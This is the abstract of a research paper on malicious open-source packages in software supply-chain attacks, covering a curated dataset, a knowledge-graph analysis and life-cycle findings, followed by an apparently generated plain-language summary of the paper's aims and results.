OSS Malicious Package Analysis in the Wild

Xiaoyan Zhou,Ying Zhang,Wenjia Niu,Jiqiang Liu,Haining Wang,Qiang Li
2024-04-21
Abstract:The open-source software (OSS) ecosystem suffers from various security threats and risks, and malicious packages play a central role in software supply chain (SSC) attacks. Although malware research has a history of over thirty years, less attention has been paid to OSS malware. Its existing research has three limitations: a lack of high-quality datasets, malware diversity, and attack campaign context. In this paper, we first build and curate the largest dataset of 23,425 malicious packages from scattered online sources. We then propose a knowledge graph to represent the OSS malware corpus and conduct malicious package analysis in the wild. Our main findings include (1) it is essential to collect malicious packages from various online sources because there is little data overlap between different sources; (2) despite the sheer volume of SSC attack campaigns, many malicious packages are similar, and unknown/sophisticated attack behaviors have yet to emerge or be detected; (3) OSS malicious package has its distinct life cycle, denoted as {changing->release->detection->removal}, and slightly changing the package (different name) is a widespread attack manner; (4) while malicious packages often lack context about how and who released them, security reports disclose the information about corresponding SSC attack campaigns.
Cryptography and Security,Software Engineering
What problem does this paper attempt to address?
The problem that this paper attempts to solve is the security threats and risks existing in the open - source software (OSS) ecosystem, especially the role of malware packages in software supply - chain (SSC) attacks. Although malware research has a history of more than 30 years, less attention has been paid to OSS malware, and the existing research has the following three main limitations: 1. **Lack of high - quality datasets**: The existing malware datasets are small in scale and have a single source. 2. **Insufficient diversity of malware**: Although there are a large number of malware packages, the actual code similarity is high and lacks diversity. 3. **Lack of background information on attack activities**: There is limited understanding of the specific situation of the attack activities behind the malware packages. To solve these problems, the authors carried out the following work: - **Construct a large - scale high - quality dataset**: Collected and sorted out 23,425 malware packages from different online resources, covering 10 different OSS ecosystems. - **Propose a knowledge graph representation method**: Use a knowledge graph to represent OSS malware packages and their relationships, and describe the relationships between malware packages through four types of edges (duplication, dependency, similarity, co - existence). - **Conduct empirical research**: Through the analysis of malware packages, answer research questions about dataset redundancy and quality, malware package diversity, attack activity characteristics, and the evolution of malware packages over time. ### Main findings 1. **The importance of diversifying data sources**: It is necessary to collect malware packages from multiple online sources because there is little data overlap between different sources. 2. **Slow development of malware package diversity**: Although the number of malware packages is increasing, their diversity and complexity have not changed much, indicating that the current defense tools are still effective. 3. **The life cycle of malware packages**: Malware packages have their own unique life cycle, including {modification → release → detection → removal}. Attackers usually try to attack repeatedly through minor changes (such as changing the name). 4. **Security reports provide background information on attack activities**: Although malware packages themselves lack release - related background information, security reports can reveal relevant attack activities. Through these studies, the authors hope to improve the understanding of OSS malware packages and provide strong support for protecting the security of the OSS ecosystem.